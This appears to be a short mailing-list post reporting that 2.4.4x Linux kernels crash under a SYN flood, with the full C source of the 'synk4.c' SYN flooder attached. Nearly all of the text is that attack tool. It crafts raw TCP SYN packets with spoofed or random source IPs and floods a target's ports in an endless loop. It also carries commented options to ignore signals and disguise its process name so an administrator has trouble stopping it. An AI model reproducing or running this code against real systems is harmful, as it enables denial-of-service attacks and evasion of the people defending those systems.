kernels 2.4.4[2345] crash when flooded with synk4.c

[Catalin Muresan <cata@codec.ro>]

[-- Attachment #1: Type: text/plain, Size: 141 bytes --]


	oops, I forgot to attach the source.

-- 
 Catalin Muresan
 CODEC Electronic Products
 Internet Services Department
 1916723.63 1747895.57

[-- Attachment #2: synk4.c --]
[-- Type: text/plain, Size: 7699 bytes --]

/* Syn Flooder by Zakath
 * TCP Functions by trurl_ (thanks man).
 * Some more code by Zakath.
 * Speed/Misc Tweaks/Enhancments -- ultima
 * Nice Interface -- ultima
 * Random IP Spoofing Mode -- ultima
 * How To Use:
 * Usage is simple. srcaddr is the IP the packets will be spoofed from.
 * dstaddr is the target machine you are sending the packets to.
 * low and high ports are the ports you want to send the packets to.
 * Random IP Spoofing Mode: Instead of typing in a source address, 
 * just use '0'. This will engage the Random IP Spoofing mode, and
 * the source address will be a random IP instead of a fixed ip.
 * Released: [4.29.97]
 *  To compile: cc -o synk4 synk4.c
 * 
 */
#include <signal.h>
#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <linux/ip.h>
#include <linux/tcp.h>
/* These can be handy if you want to run the flooder while the admin is on
 * this way, it makes it MUCH harder for him to kill your flooder */
/* Ignores all signals except Segfault */
// #define HEALTHY
/* Ignores Segfault */
// #define NOSEGV
/* Changes what shows up in ps -aux to whatever this is defined to */
// #define HIDDEN "vi .cshrc"
#define SEQ 0x28376839
#define getrandom(min, max) ((rand() % (int)(((max)+1) - (min))) + (min))

unsigned long send_seq, ack_seq, srcport;
char flood = 0;
int sock, ssock, curc, cnt;

/* Check Sum */
unsigned short ip_sum(addr, len)
u_short *addr;
int len;
{
	register int nleft = len;
	register u_short *w = addr;
	register int sum = 0;
	u_short answer = 0;

	while (nleft > 1) {
		sum += *w++;
		nleft -= 2;
	}
	if (nleft == 1) {
		*(u_char *) (&answer) = *(u_char *) w;
		sum += answer;
	}
	sum = (sum >> 16) + (sum & 0xffff);	/* add hi 16 to low 16 */
	sum += (sum >> 16);			/* add carry */
	answer = ~sum;				/* truncate to 16 bits */
	return (answer);
}
void sig_exit(int crap)
{
#ifndef HEALTHY
	printf("^[[H^[[JSignal Caught. Exiting Cleanly.\n");
	exit(crap);
#endif
}
void sig_segv(int crap)
{
#ifndef NOSEGV
	printf("^[[H^[[JSegmentation Violation Caught. Exiting Cleanly.\n");
	exit(crap);
#endif
}

unsigned long getaddr(char *name)
{
	struct hostent *hep;

	hep = gethostbyname(name);
	if (!hep) {
		fprintf(stderr, "Unknown host %s\n", name);
		exit(1);
	}
	return *(unsigned long *) hep->h_addr;
}


void send_tcp_segment(struct iphdr *ih, struct tcphdr *th, char *data,
					  int dlen)
{
	char buf[65536];
	struct {					/* rfc 793 tcp pseudo-header */
		unsigned long saddr, daddr;
		char mbz;
		char ptcl;
		unsigned short tcpl;
	} ph;

	struct sockaddr_in sin;		/* how necessary is this, given that the destination
								   address is already in the ip header? */

	ph.saddr = ih->saddr;
	ph.daddr = ih->daddr;
	ph.mbz = 0;
	ph.ptcl = IPPROTO_TCP;
	ph.tcpl = htons(sizeof(*th) + dlen);

	memcpy(buf, &ph, sizeof(ph));
	memcpy(buf + sizeof(ph), th, sizeof(*th));
	memcpy(buf + sizeof(ph) + sizeof(*th), data, dlen);
	memset(buf + sizeof(ph) + sizeof(*th) + dlen, 0, 4);
	th->check = ip_sum(buf, (sizeof(ph) + sizeof(*th) + dlen + 1) & ~1);

	memcpy(buf, ih, 4 * ih->ihl);
	memcpy(buf + 4 * ih->ihl, th, sizeof(*th));
	memcpy(buf + 4 * ih->ihl + sizeof(*th), data, dlen);
	memset(buf + 4 * ih->ihl + sizeof(*th) + dlen, 0, 4);

	ih->check = ip_sum(buf, (4 * ih->ihl + sizeof(*th) + dlen + 1) & ~1);
	memcpy(buf, ih, 4 * ih->ihl);

	sin.sin_family = AF_INET;
	sin.sin_port = th->dest;
	sin.sin_addr.s_addr = ih->daddr;

	if (sendto
		(ssock, buf, 4 * ih->ihl + sizeof(*th) + dlen, 0, &sin,
		 sizeof(sin)) < 0) {
		printf("Error sending syn packet.\n");
		perror("");
		exit(1);
	}
}

unsigned long spoof_open(unsigned long my_ip, unsigned long their_ip,
						 unsigned short port)
{
	int i, s;
	struct iphdr ih;
	struct tcphdr th;
	struct sockaddr_in sin;
	int sinsize;
	unsigned short myport = 6969;
	char buf[1024];
	struct timeval tv;

	ih.version = 4;
	ih.ihl = 5;
	ih.tos = 0;					/* XXX is this normal? */
	ih.tot_len = sizeof(ih) + sizeof(th);
	ih.id = htons(random());
	ih.frag_off = 0;
	ih.ttl = 30;
	ih.protocol = IPPROTO_TCP;
	ih.check = 0;
	ih.saddr = my_ip;
	ih.daddr = their_ip;

	th.source = htons(srcport);
	th.dest = htons(port);
	th.seq = htonl(SEQ);
	th.doff = sizeof(th) / 4;
	th.ack_seq = 0;
	th.res1 = 0;
	th.fin = 0;
	th.syn = 1;
	th.rst = 0;
	th.psh = 0;
	th.ack = 0;
	th.urg = 0;
//  th.res2=0;
	th.window = htons(65535);
	th.check = 0;
	th.urg_ptr = 0;

	gettimeofday(&tv, 0);

	send_tcp_segment(&ih, &th, "", 0);

	send_seq = SEQ + 1 + strlen(buf);
}
void upsc()
{
	int i;
	char schar[5] = "|/-\\";

	printf("^[[H^[[1;30m[^[[1;31m%c^[[1;30m]^[[0m %d", schar[cnt], curc);
	cnt++;
	cnt %= 4;
	for (i = 0; i < 26; i++) {
		i++;
		curc++;
	}
}
void init_signals()
{
	// Every Signal known to man. If one gives you an error, comment it out!
	signal(SIGHUP, sig_exit);
	signal(SIGINT, sig_exit);
	signal(SIGQUIT, sig_exit);
	signal(SIGILL, sig_exit);
	signal(SIGTRAP, sig_exit);
	signal(SIGIOT, sig_exit);
	signal(SIGBUS, sig_exit);
	signal(SIGFPE, sig_exit);
	signal(SIGKILL, sig_exit);
	signal(SIGUSR1, sig_exit);
	signal(SIGSEGV, sig_segv);
	signal(SIGUSR2, sig_exit);
	signal(SIGPIPE, sig_exit);
	signal(SIGALRM, sig_exit);
	signal(SIGTERM, sig_exit);
	signal(SIGCHLD, sig_exit);
	signal(SIGCONT, sig_exit);
	signal(SIGSTOP, sig_exit);
	signal(SIGTSTP, sig_exit);
	signal(SIGTTIN, sig_exit);
	signal(SIGTTOU, sig_exit);
	signal(SIGURG, sig_exit);
	signal(SIGXCPU, sig_exit);
	signal(SIGXFSZ, sig_exit);
	signal(SIGVTALRM, sig_exit);
	signal(SIGPROF, sig_exit);
	signal(SIGWINCH, sig_exit);
	signal(SIGIO, sig_exit);
	signal(SIGPWR, sig_exit);
}
main(int argc, char **argv)
{
	int i, x, max, floodloop, diff, urip, a, b, c, d;
	unsigned long them, me_fake;
	unsigned lowport, highport;
	char buf[1024], *junk;

	init_signals();
#ifdef HIDDEN
	for (i = argc - 1; i >= 0; i--)
		/* Some people like bzero...i prefer memset :) */
		memset(argv[i], 0, strlen(argv[i]));
	strcpy(argv[0], HIDDEN);
#endif

	if (argc < 5) {
		printf("Usage: %s srcaddr dstaddr low high\n", argv[0]);
		printf("    If srcaddr is 0, random addresses will be used\n\n\n");

		exit(1);
	}
	if (atoi(argv[1]) == 0)
		urip = 1;
	else
		me_fake = getaddr(argv[1]);
	them = getaddr(argv[2]);
	lowport = atoi(argv[3]);
	highport = atoi(argv[4]);
	srandom(time(0));
	ssock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
	if (ssock < 0) {
		perror("socket (raw)");
		exit(1);
	}
	sock = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
	if (sock < 0) {
		perror("socket");
		exit(1);
	}
	junk = (char *) malloc(1024);
	max = 1500;
	i = 1;
	diff = (highport - lowport);

	if (diff > -1) {
		printf
			("^[[H^[[J\n\nCopyright (c) 1980, 1983, 1986, 1988, 1990, 1991 The Regents of the University\n of California. All Rights Reserved.");
		for (i = 1; i > 0; i++) {
			srandom((time(0) + i));
			srcport = getrandom(1, max) + 1000;
			for (x = lowport; x <= highport; x++) {
				if (urip == 1) {
					a = getrandom(0, 255);
					b = getrandom(0, 255);
					c = getrandom(0, 255);
					d = getrandom(0, 255);
					sprintf(junk, "%i.%i.%i.%i", a, b, c, d);
					me_fake = getaddr(junk);
				}

				spoof_open( /*0xe1e26d0a */ me_fake, them, x);
				/* A fair delay. Good for a 28.8 connection */
				//  usleep(300);

				if (!(floodloop = (floodloop + 1) % (diff + 1))) {
					upsc();
					fflush(stdout);
				}
			}
		}
	} else {
		printf("High port must be greater than Low port.\n");
		exit(1);
	}
}